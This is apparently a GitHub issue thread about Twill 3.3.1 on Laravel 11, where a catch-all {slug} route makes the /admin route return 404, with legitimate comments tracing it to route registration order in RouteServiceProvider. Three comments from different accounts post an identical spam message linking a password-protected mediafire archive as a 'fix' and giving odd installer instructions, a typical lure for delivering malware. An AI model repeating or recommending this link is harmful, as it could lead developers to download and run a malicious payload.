### ISSUE TITLE
Laravel 11 + catch-all route results in `/admin` route throwing 404

### ISSUE THREAD

**Issue by dcmastenbroek** [area17/twill#2646]
## Description

The `/admin` route throws a 404 error when using a fresh Laravel 11 install and the `basic-page-builder` preset. I narrowed it down to the catch-all route that is being used: `Route::get('{slug}', [\App\Http\Controllers\PageDisplayController::class, 'show'])->name('frontend.page');`. 

### Steps to reproduce

Use a fresh install of Laravel 11 and go through the "Installation" steps defined in the docs and use the `basic-page-builder` starter kit.

### Expected result

I can access the admin via `/admin`.

### Actual result

A 404 error gets thrown when trying to access `/admin`.

### Versions

Twill version: 3.3.1
Laravel version: 11
PHP version: 8.3
Database engine: MySQL

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by li371359001** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Satyam1Deepu** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by bartlomiej-przymus** [comment]
I have also experienced this, wanted to check out twill, brand new install after running `php artisan twill:install basic-page-builder` i tried accessing /admin and got 404. I think it is to do with sequence in which routes are registered. If I comment catch-all {slug} route the  /admin works as expected.
I can list all available routes with php artisan route:list and admin endpoint is available.

Twill version: 3.3.1
Laravel version: 11.24
PHP version: 8.3.7
Database engine: MySQL

**Comment by bartlomiej-przymus** [comment]
Just to add to this to confirm I had a bit of poke around the codebase and it seems that `vendor/area17/twill/src/RouteServiceProvider.php` is responsible for mapping all the routes from package to already existing ones on app. 

If I dump $router at the beginning of that file like this:
<img width="618" alt="Screenshot 2024-09-26 at 12 23 47" src="https://github.com/user-attachments/assets/8b516211-0b51-44df-8d3c-51c7759b8848">
I get this when visiting `/admin` route:
<img width="370" alt="Screenshot 2024-09-26 at 12 23 37" src="https://github.com/user-attachments/assets/a0aa11be-6d74-4092-a31c-b7e347f2b666">
And if I move dd() below mapInternalRoutes I get the rest of the routes mapped below already existing:
<img width="664" alt="Screenshot 2024-09-26 at 12 27 05" src="https://github.com/user-attachments/assets/885c99bd-381f-4c00-aab4-e4fa7220756c">
<img width="647" alt="Screenshot 2024-09-26 at 12 27 30" src="https://github.com/user-attachments/assets/814dc23c-b2b2-4c0e-aadb-27db129c5ace">

I have attempted to fix this but I failed so far to find the way to reorder the routes so it works out of the box.
